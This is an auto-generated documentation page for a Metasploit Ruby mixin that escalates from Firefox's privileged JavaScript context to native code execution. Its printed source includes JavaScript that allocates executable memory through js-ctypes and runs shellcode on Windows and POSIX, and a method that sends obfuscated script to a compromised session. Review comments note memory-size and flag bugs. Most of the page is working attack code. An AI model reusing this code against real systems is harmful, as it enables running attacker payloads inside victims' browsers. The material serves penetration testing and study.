<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::FirefoxPrivilegeEscalation
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::FirefoxPrivilegeEscalation";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div id="main" tabindex="-1">
<div id="content"><h1>Module: Msf::Exploit::Remote::FirefoxPrivilegeEscalation
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></dd>
</dl>
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="FirefoxAddonGenerator.html" title="Msf::Exploit::Remote::FirefoxAddonGenerator (module)">FirefoxAddonGenerator</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/firefox_privilege_escalation.rb</dd>
</dl>
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#exec_shellcode_source-instance_method" title="#exec_shellcode_source (instance method)">#<strong>exec_shellcode_source</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Puts the shellcode into memory, marks the region executable (RWX), and calls it. The generated JavaScript function throws on error.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#js_exec-instance_method" title="#js_exec (instance method)">#<strong>js_exec</strong>(js, timeout = 30) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sends the <code>js</code> code to the remote session, which executes it in Firefox's privileged JavaScript context.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#js_target%3F-instance_method" title="#js_target? (instance method)">#<strong>js_target?</strong> &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>True when the user has selected a JavaScript (non-native) target.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#run_payload-instance_method" title="#run_payload (instance method)">#<strong>run_payload</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>For a JavaScript payload, this simply returns the payload source. For a native payload, this calls the correct methods to allocate RWX memory and execute the shellcode.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../JSObfu.html#initialize-instance_method" title="Msf::Exploit::JSObfu#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../JSObfu.html#js_obfuscate-instance_method" title="Msf::Exploit::JSObfu#js_obfuscate (method)">#js_obfuscate</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="exec_shellcode_source-instance_method">
#<strong>exec_shellcode_source</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Puts the shellcode into memory, marks the region executable (RWX), and calls it. The generated JavaScript function throws on error.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>JavaScript source defining the execShellcode() function</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 34</span>
<span class='comment'># Returns JavaScript source (as a Ruby string) that defines</span>
<span class='comment'># execShellcode(shellcode, bytes), which runs native shellcode inside the</span>
<span class='comment'># Firefox process through js-ctypes. It only works in a chrome-privileged</span>
<span class='comment'># context, since it imports resource://gre/modules/ctypes.jsm.</span>
<span class='comment'>#</span>
<span class='comment'># execShellcode tries execWindows first, then execPosix, returns true on the</span>
<span class='comment'># first success, and throws an Error listing every failure if both raise.</span>
<span class='comment'># Each strategy:</span>
<span class='comment'>#   * allocates shellcode.length bytes of memory (VirtualAlloc with alloc</span>
<span class='comment'>#     type 0x1000 and protection 0x40, or mmap with prot 7 and flags 4098;</span>
<span class='comment'>#     the names RWX / ANON_PRIVATE in the code describe the intent),</span>
<span class='comment'>#   * copies `bytes` bytes from a ctypes.jschar array built from the JS</span>
<span class='comment'>#     string (so UTF-16 code units, not decoded bytes, are the source),</span>
<span class='comment'>#   * recovers the buffer address by regex-matching the pointer's</span>
<span class='comment'>#     toString() output, casts it to a function pointer and calls it: on</span>
<span class='comment'>#     Windows from a new thread (CreateThread), on POSIX in a fork()ed</span>
<span class='comment'>#     child, so the original Firefox process keeps running.</span>
<span class='comment'>#</span>
<span class='comment'># NOTE(review): the allocation is sized by shellcode.length (JS string</span>
<span class='comment'># length in UTF-16 code units) while the copy is sized by `bytes`. The</span>
<span class='comment'># caller (run_payload) passes the payload's byte count together with a</span>
<span class='comment'># string built by Rex::Text.to_unescape; if that packs two payload bytes</span>
<span class='comment'># per code unit, the copy is roughly twice the allocation. Page rounding</span>
<span class='comment'># by mmap/VirtualAlloc usually hides this, but a payload that crosses a</span>
<span class='comment'># page boundary writes past the mapping. Allocating `bytes` instead is the</span>
<span class='comment'># safe fix -- confirm the packing before changing it.</span>
<span class='comment'>#</span>
<span class='comment'># NOTE(review): neither the mmap nor the VirtualAlloc return value is</span>
<span class='comment'># checked before the copy, so an allocation failure turns into a write to</span>
<span class='comment'># an invalid address (MAP_FAILED / NULL) and a crash of the browser rather</span>
<span class='comment'># than a thrown Error. Also, mmap flags 4098 (0x1002) equal MAP_PRIVATE |</span>
<span class='comment'># MAP_ANON on macOS; Linux defines MAP_ANONYMOUS as 0x20, so on glibc</span>
<span class='comment'># targets this value appears to request a file mapping of fd 0 instead of</span>
<span class='comment'># an anonymous one -- verify against the target libc's headers.</span>
<span class='comment'>#</span>
<span class='comment'># @return [String] JavaScript code containing the execShellcode() function</span>
<span class='kw'>def</span> <span class='id identifier rubyid_exec_shellcode_source'>exec_shellcode_source</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
var execShellcode = function(shellcode, bytes) {
Components.utils.import(&quot;resource://gre/modules/ctypes.jsm&quot;);
var execPosix = function() {
var RWX = 7, ANON_PRIVATE = 4098;
Components.utils.import(&quot;resource://gre/modules/ctypes.jsm&quot;);
var LIBS = [
&quot;/usr/lib/libSystem.B.dylib&quot;,
&quot;libc.so.6&quot;,
&quot;libc.so&quot;
];
var i, lib;
for (i in LIBS) {
try {
lib = ctypes.open(LIBS[i]);
break;
} catch (e) {}
}
if (!lib) throw new Error(&quot;Could not find lib in [&quot;+LIBS+&quot;]&quot;);
var mmap = lib.declare(&#39;mmap&#39;,
ctypes.default_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* address (NULL here) */
ctypes.size_t, /* num bytes */
ctypes.int, /* PROT_READ OR PROT_WRITE OR PROT_EXEC */
ctypes.int, /* MAP_ANONYMOUS OR MAP_PRIVATE */
ctypes.int, /* fd (0) */
ctypes.int /* offset (0) */
);
var memcpy = lib.declare(&#39;memcpy&#39;,
ctypes.default_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* dest */
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var fork = lib.declare(&#39;fork&#39;,
ctypes.default_abi, /* calling convention */
ctypes.int /* return type */
);
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
var cstr = ctypes.jschar.array()(shellcode);
memcpy(buff, cstr, bytes);
/* there is probably a better way to do this */
var m = buff.toString().match(/&quot;0x([0-9a-fA-F]*)&quot;/);
if (!m) throw new Error(&quot;Could not find address of buffer.&quot;);
if (fork() == 0) {
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
}
};
var execWindows = function() {
var RWX = 0x40, ANON_PRIVATE = 0x1000;
var Kernel32 = ctypes.open(&quot;Kernel32.dll&quot;);
var VirtualAlloc = Kernel32.declare(&#39;VirtualAlloc&#39;,
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* start address (NULL here) */
ctypes.size_t, /* num bytes */
ctypes.unsigned_long, /* alloc type */
ctypes.unsigned_long /* protection flags */
);
var RtlMoveMemory = Kernel32.declare(&#39;RtlMoveMemory&#39;,
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* dest */
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var CreateThread = Kernel32.declare(&#39;CreateThread&#39;,
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* lpThreadAttributes */
ctypes.voidptr_t, /* dwStackSize */
ctypes.voidptr_t, /* lpStartAddress copy */
ctypes.voidptr_t, /* lpParameter */
ctypes.voidptr_t, /* dwCreationFlags */
ctypes.voidptr_t /* lpThreadId */
);
var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX);
var cstr = ctypes.jschar.array()(shellcode);
RtlMoveMemory(buff, cstr, bytes);
var m = buff.toString().match(/&quot;0x([0-9a-fA-F]+)&quot;/);
if (!m) throw new Error(&quot;Could not find address of buffer.&quot;);
var fn = ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16));
CreateThread(null, null, fn, null, null, null);
};
var i, errs = [], fns = [execWindows, execPosix];
for (i in fns) {
try {
fns[i](shellcode);
return true;
} catch(e) { errs.push(e.message); }
}
throw new Error(&quot;All methods failed. Exceptions encountered:\\n[&quot;+errs+&quot;]&quot;);
};
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="js_exec-instance_method">
#<strong>js_exec</strong>(js, timeout = 30) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Sends the <code>js</code> code to the remote session, which executes it in Firefox's privileged JavaScript context. The code is obfuscated if the JsObfuscate datastore option is set to 1 or higher.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the results that were sent back. The script can produce them either by calling the "send" function or by simply returning the value from <code>js</code>.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 23</span>
<span class='comment'># Runs `js` in the remote session's privileged (chrome) JavaScript context</span>
<span class='comment'># and returns whatever the session sends back.</span>
<span class='comment'>#</span>
<span class='comment'># js_obfuscate (from JSObfu) is called unconditionally here; the</span>
<span class='comment'># JsObfuscate datastore option described in the docstring is presumably</span>
<span class='comment'># honored inside that helper. The request is framed as</span>
<span class='comment'># TOKEN[JAVASCRIPT]...[/JAVASCRIPT]TOKEN, where TOKEN wraps 8 fresh random</span>
<span class='comment'># alphabetic characters in [[ ]], and the reply is read until the fixed</span>
<span class='comment'># [!JAVASCRIPT] marker or until `timeout` seconds elapse.</span>
<span class='comment'>#</span>
<span class='comment'># NOTE(review): the reply terminator is the constant marker, not the</span>
<span class='comment'># random token, so a script result that itself contains the literal text</span>
<span class='comment'># [!JAVASCRIPT] ends the read early -- confirm the session side escapes it</span>
<span class='comment'># or never emits it. What shell_read_until_token returns on timeout is not</span>
<span class='comment'># visible here; callers should not assume a String.</span>
<span class='comment'>#</span>
<span class='comment'># @param js [String] JavaScript source to execute remotely</span>
<span class='comment'># @param timeout [Integer] seconds to wait for the reply (default 30)</span>
<span class='comment'># @return [String] the results that were sent back</span>
<span class='kw'>def</span> <span class='id identifier rubyid_js_exec'>js_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_js'>js</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='op'>=</span><span class='int'>30</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Running the privileged javascript...</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_token'>token</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[[</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>]]</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_js'>js</span> <span class='op'>=</span> <span class='id identifier rubyid_js_obfuscate'>js_obfuscate</span><span class='lparen'>(</span><span class='id identifier rubyid_js'>js</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_shell_write'>shell_write</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_token'>token</span><span class='embexpr_end'>}</span><span class='tstring_content'>[JAVASCRIPT]</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_js'>js</span><span class='embexpr_end'>}</span><span class='tstring_content'>[/JAVASCRIPT]</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_token'>token</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_shell_read_until_token'>shell_read_until_token</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[!JAVASCRIPT]</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="js_target?-instance_method">
#<strong>js_target?</strong> &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns true when the user has selected a JavaScript (non-native) target.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'>
<p>true when the selected target's first architecture is ARCH_FIREFOX, i.e. a JavaScript (non-native) target; false when the target has no architecture</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 152</span>
<span class='comment'># True when the selected target is a JavaScript (non-native) one.</span>
<span class='comment'>#</span>
<span class='comment'># Only the first entry of target.arch is examined; a target whose arch is</span>
<span class='comment'># nil/false is treated as native.</span>
<span class='comment'>#</span>
<span class='comment'># @return [Boolean] target.arch[0] == ARCH_FIREFOX, or false when arch is unset</span>
<span class='kw'>def</span> <span class='id identifier rubyid_js_target?'>js_target?</span>
<span class='kw'>if</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span>
<span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='const'>ARCH_FIREFOX</span>
<span class='kw'>else</span>
<span class='kw'>false</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="run_payload-instance_method">
#<strong>run_payload</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>For a JavaScript payload, this simply returns the payload source. For a native payload, this calls the correct methods to allocate RWX memory and execute the shellcode.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>JavaScript source code that kicks off the execution of the payload</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 142</span>
<span class='comment'># Builds the JavaScript that starts the selected payload.</span>
<span class='comment'>#</span>
<span class='comment'># For a JavaScript target (see js_target?) the encoded payload is returned</span>
<span class='comment'># unchanged. Otherwise the result prepends exec_shellcode_source and calls</span>
<span class='comment'># execShellcode() with the payload encoded by Rex::Text.to_unescape (decoded</span>
<span class='comment'># client-side with unescape()) and its byte length</span>
<span class='comment'># (payload.encoded.bytes.to_a.length, equivalent to bytesize).</span>
<span class='comment'>#</span>
<span class='comment'># NOTE(review): execShellcode sizes its allocation by the decoded JS</span>
<span class='comment'># string's length but its copy by this byte count; if to_unescape packs two</span>
<span class='comment'># payload bytes per JS character the two differ by about 2x -- confirm.</span>
<span class='comment'>#</span>
<span class='comment'># @return [String] JavaScript source that kicks off payload execution</span>
<span class='kw'>def</span> <span class='id identifier rubyid_run_payload'>run_payload</span>
<span class='kw'>return</span> <span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span> <span class='kw'>if</span> <span class='id identifier rubyid_js_target?'>js_target?</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_exec_shellcode_source'>exec_shellcode_source</span><span class='embexpr_end'>}</span><span class='tstring_content'>
var sc = unescape(&quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_unescape'>to_unescape</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;);
execShellcode(sc, </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_to_a'>to_a</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</body>
</html>